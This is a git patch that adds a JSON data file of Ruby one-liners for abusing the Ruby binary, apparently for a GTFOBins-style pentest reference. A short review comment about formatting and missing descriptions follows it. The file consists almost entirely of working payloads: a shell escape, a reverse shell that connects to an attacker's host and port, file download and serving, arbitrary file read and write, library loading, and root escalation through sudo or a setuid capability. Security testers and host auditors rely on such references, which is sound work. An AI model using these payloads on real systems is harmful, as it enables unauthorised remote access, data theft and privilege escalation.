From 7cfbb1fc3c60bd6c6325a80aae64bc324d94df3b Mon Sep 17 00:00:00 2001
From: t0thkr1s
Date: Fri, 10 Jan 2020 13:00:28 +0100
Subject: [PATCH] add data for ruby
---
data/ruby.json | 52 ++++++++++++++++++++++++++++++++++++++++++++++++++
1 file changed, 52 insertions(+)
create mode 100644 data/ruby.json
diff --git a/data/ruby.json b/data/ruby.json
new file mode 100644
index 0000000..b721c38
--- /dev/null
+++ b/data/ruby.json
@@ -0,0 +1,52 @@
+{
+ "functions": {
+ "shell": [
+ {
+ "code": "ruby -e 'exec \"/bin/sh\"'"
+ }
+ ],
+ "reverse-shell": [
+ {
+ "description": "Run 'nc -l -p [port]' on the attacker box to receive the shell.",
+ "code": "ruby -rsocket -e 'exit if fork;c=TCPSocket.new(\"[host]\",\"[port]\");while(cmd=c.gets);IO.popen(cmd,\"r\"){|io|c.print io.read}end'\n"
+ }
+ ],
+ "file-upload": [
+ {
+ "description": "Serve files in the local folder running an HTTP server. This requires version 1.9.2 or later.",
+ "code": "ruby -run -e httpd . -p [port]\n"
+ }
+ ],
+ "file-download": [
+ {
+ "description": "Fetch a remote file via HTTP GET request.",
+ "code": "ruby -e 'require \"open-uri\"; IO.copy_stream(open(\"[url]\"), \"[file]\")'\n"
+ }
+ ],
+ "file-write": [
+ {
+ "code": "ruby -e 'File.open(\"[file]\", \"w+\") { |f| f.write(\"DATA\") }'"
+ }
+ ],
+ "file-read": [
+ {
+ "code": "ruby -e 'puts File.read(\"[file]\")'"
+ }
+ ],
+ "library-load": [
+ {
+ "code": "ruby -e 'require \"fiddle\"; Fiddle.dlopen(\"lib.so\")'"
+ }
+ ],
+ "sudo": [
+ {
+ "code": "sudo ruby -e 'exec \"/bin/sh\"'"
+ }
+ ],
+ "capabilities": [
+ {
+ "code": "./ruby -e 'Process::Sys.setuid(0); exec \"/bin/sh\"'"
+ }
+ ]
+ }
+}
\ No newline at end of file
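Review bot: Three of the `code` strings (`reverse-shell`, `file-upload`, `file-download`) end in a literal `\n` while the other six do not, which looks like residue from a block-scalar conversion; any consumer that renders or compares these values will carry the stray newline, so strip it from all three or document that consumers must trim. The `sudo` and `capabilities` entries also have no `description`, so the file does not state which host misconfiguration each one depends on. A line such as `"description": "Applies only when sudoers permits running ruby as root."` and, for `capabilities`, one naming the file capability the binary must hold (presumably CAP_SETUID, given the `setuid(0)` call) would tell someone auditing a host what to look for. The file also ends without a trailing newline.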